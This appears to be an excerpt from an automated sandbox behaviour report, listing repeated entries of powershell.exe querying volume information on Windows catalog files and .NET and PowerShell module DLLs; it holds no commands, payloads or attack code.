Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
